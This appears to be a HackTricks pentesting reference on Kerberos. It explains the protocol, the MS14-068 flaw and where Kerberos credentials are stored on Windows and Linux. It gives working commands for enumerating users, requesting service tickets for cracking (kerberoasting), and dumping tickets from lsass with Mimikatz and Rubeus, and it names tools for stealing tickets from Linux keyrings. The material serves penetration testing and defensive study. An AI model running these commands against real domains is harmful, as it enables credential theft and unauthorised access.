Kerberos

Reading time: 4 minutes

Basic Information

Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks.

In environments like Active Directory, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process.

After authentication by Kerberos, the decision-making process regarding access to resources is delegated to individual services within the network. These services are then responsible for evaluating the authenticated user's rights and permissions, based on the information provided by Kerberos about the user's privileges. This design allows for a separation of concerns between authenticating the identity of users and managing their access rights, enabling a more flexible and secure approach to resource management in distributed networks.

Default Port: 88/tcp/udp

PORT   STATE SERVICE
88/tcp open  kerberos-sec

To learn how to abuse Kerberos you should read the post about Active Directory.

More

Shodan

• port:88 kerberos

MS14-068

The MS14-068 flaw permits an attacker to tamper with a legitimate user's Kerberos login token to falsely claim elevated privileges, such as being a Domain Admin. This counterfeit claim is mistakenly validated by the Domain Controller, enabling unauthorized access to network resources across the Active Directory forest.

Kerberos Vulnerability in MS14-068 (KB3011780) Explained – Active Directory Security

Other exploits: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek

HackTricks Automatic Commands

Protocol_Name: Kerberos    #Protocol Abbreviation if there is one.
Port_Number:  88   #Comma separated if there is more than one.
Protocol_Description: AD Domain Authentication         #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for Kerberos
  Note: |
    Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks.
    In environments like **Active Directory**, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process.

    https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-88/index.html

Entry_2:
  Name: Pre-Creds
  Description: Brute Force to get Usernames
  Command: nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} {IP}

Entry_3:
  Name: With Usernames
  Description: Brute Force with Usernames and Passwords
  Note: consider git clone https://github.com/ropnop/kerbrute.git ./kerbrute -h

Entry_4:
  Name: With Creds
  Description: Attempt to get a list of user service principal names
  Command: GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs

Harvesting tickets from Windows

Reading time: 2 minutes

Tickets in Windows are managed and stored by the lsass (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system. For such operations, the tools Mimikatz and Rubeus are widely employed, each offering different commands and functionalities.

Mimikatz

Mimikatz is a versatile tool that can interact with Windows security. It's used not only for extracting tickets but also for various other security-related operations.

bash

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus is a tool specifically tailored for Kerberos interaction and manipulation. It's used for ticket extraction and handling, as well as other Kerberos-related activities.

bash

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

When using these commands, ensure to replace placeholders like <BASE64_TICKET> and <luid> with the actual Base64 encoded ticket and Logon ID respectively. These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows.

References

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

Credential Storage in Linux

Linux systems store credentials in three types of caches, namely Files (in /tmp directory), Kernel Keyrings (a special segment in the Linux kernel), and Process Memory (for single-process use). The default_ccache_name variable in /etc/krb5.conf reveals the storage type in use, defaulting to FILE:/tmp/krb5cc_%{uid} if not specified.

Extracting Credentials

The 2017 paper, Kerberos Credential Thievery (GNU/Linux), outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernel's keyring mechanism for managing and storing keys.

Keyring Extraction Overview

The keyctl system call, introduced in kernel version 2.6.10, allows user space applications to interact with kernel keyrings. Credentials in keyrings are stored as components (default principal and credentials), distinct from file ccaches which also include a header. The hercules.sh script from the paper demonstrates extracting and reconstructing these components into a usable file ccache for credential theft.

Ticket Extraction Tool: Tickey

Building on the principles of the hercules.sh script, the tickey tool is specifically designed for extracting tickets from keyrings, executed via /tmp/tickey -i.